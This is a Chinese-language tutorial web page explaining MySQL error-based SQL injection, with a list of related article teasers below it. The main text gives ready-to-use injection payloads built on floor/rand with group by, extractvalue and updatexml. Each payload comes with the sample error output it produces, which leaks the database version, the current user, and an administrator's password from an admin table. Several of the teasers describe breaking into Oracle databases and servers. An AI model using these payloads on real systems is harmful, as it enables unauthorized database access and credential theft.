mysql注入如何通过floor报错？UpdateXml测试语句是什么？

2018-03-13 12:12:15责编：llp 来源：驱动管家人气：

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

mysql注入如何通过floor报错？UpdateXml测试语句是什么？

举例如下：

首先进行正常查询：

mysql> select * from article where id = 1;

+—-+——-+———+

id | title | content |

+—-+——-+———+

1 | test | do it |

+—-+——-+———+

假如id输入存在注入的话，可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

ERROR 1062 (23000): Duplicate entry ‘5.1.33-community-log1’ for key ‘group_key’

可以看到成功爆出了Mysql的版本，如果需要查询其他数据，可以通过修改version()所在位置语句进行查询。

例如我们需要查询管理员用户名和密码：

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);

ERROR 1062 (23000): Duplicate entry ‘admin8881’ for key ‘group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));

ERROR 1062 (23000): Duplicate entry ‘admin8881’ for key ‘group_key’

2、extractvalue测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–

ERROR 1105 (HY000): XPATH syntax error: ‘\admin888’

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ‘:root@localhost’

oracle数据库学习谈谈入侵oracle数据库的体会
一、先看下面的一个贴子:Oracle数据库是现在很流行的数据库系统，很多大型网站都采用Oracle，它之所以倍受用户喜爱是因为它有以下突出的特点：1、支持大数据库、多用户的高性能的事务处理。Oracle支持最大数据库
详情2018-01-11 16:24:29责编：llp 来源：驱动管家
什么是网络安全域？网络安全域的主要模块
网络安全域是指同一系统内有相同的安全保护需求、相互信任，并具有相同的安全访问控制和边界控制策略的子网或网络，相同的网络安全域共享一样的安全策略。网络安全域从广义上可理解为具有相同业务要求和安全要求
详情2018-03-01 09:44:08责编：llp 来源：驱动管家
oracle数据库教程电脑高手入侵oracle数据库有哪些常用的命令？
最近遇到一个使用了Oracle数据库的服务器，在狂学Oracle 请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦，为了兄弟们以后少走些弯路，我把入侵当中必需的命令整理出来。1
详情2018-01-13 20:02:40责编：llp 来源：驱动管家
为了防止公司存储在u盘的数据遭窃，u盘设置只读方式
但对某些重视信息安全的公司来说，U盘导致数据泄密的威胁很大。由于U盘的介质非常灵活，可以做成手表等非常规形状。还可以通过数码相机，MP3等数码产品来实现，因此使用U盘可以非常方便地把一些重要数据复制出来
详情2018-01-28 15:29:24责编：llp 来源：驱动管家
入侵如何在对方的服务器打上微软自家的补丁解决互传文件的问题？
很多朋友利用输入法漏洞通过3389端口入侵别人的服务器时，会发现在连接对方机器后，无法像内网计算机那样可以互传文件，这在很大程度上使入侵后的攻击大打折扣，其实打上微软自家的“补丁”就可以解决这个问题。
详情2018-03-03 08:43:44责编：llp 来源：驱动管家
为什么企业数据泄密？要如何防范企业数据泄密？
当前企业信息安全、商业机密保护是国内各行业网络管理的热点，在知识经济时代，商业机密的安全管理至关重要。如何防止员工复制电脑文件到U盘携带出去，如何禁止员工通过QQ发送文件将商业机密发送出去，以及如何禁
详情2018-01-06 16:52:46责编：llp 来源：驱动管家
如何进行qq密保设置？qq密保令牌不能使用怎么办？
腾讯公司在2009年5月7日上午9点推出全新的QQ安全中心，特别推出密保令牌服务。密保令牌是二代密保其中的一个密保手段，需要安装在手机上，可以显示6位动态密码。当您成功绑定密保令牌后，令牌将会出现在“统一安
详情2018-01-17 12:20:54责编：llp 来源：驱动管家
强化windows server 2003功能的15个步骤
《Hardening Windows》的作者Jonathan Hassell进行了一次检查表式的网上直播，概述了你现在马上可以采取，用以强化Windows Server 2003功能的15个步骤，以更好的应对各种威胁。我们现在就来看看Jonathan的15
详情2018-02-28 19:41:41责编：llp 来源：驱动管家
电子邮件系统加密方法电子邮件加密的一些建议
近几年来，针对公司的间谍活动越来越严重。因此部署某种加密系统以确保窥探者不能从其截获的消息中破译什么内容，或者不能因为电脑被窃取而丢失信息是非常有意义的。不管是客户的数据，雇员数据，知识产权还是财
详情2018-01-26 15:42:15责编：llp 来源：驱动管家
数据库web分离有什么好处？如何判断数据库web是否分离？
数据库web分离有什么好处？数据库服务器可以只对WEB服务器提供服务，不至于暴露在互联网中；将网络嗅探，暴力破解的可能性降到最低；数据库服务器可以只提供数据检索服务而不必处理其它服务；数据库服务器不需要
详情2018-02-25 12:58:52责编：llp 来源：驱动管家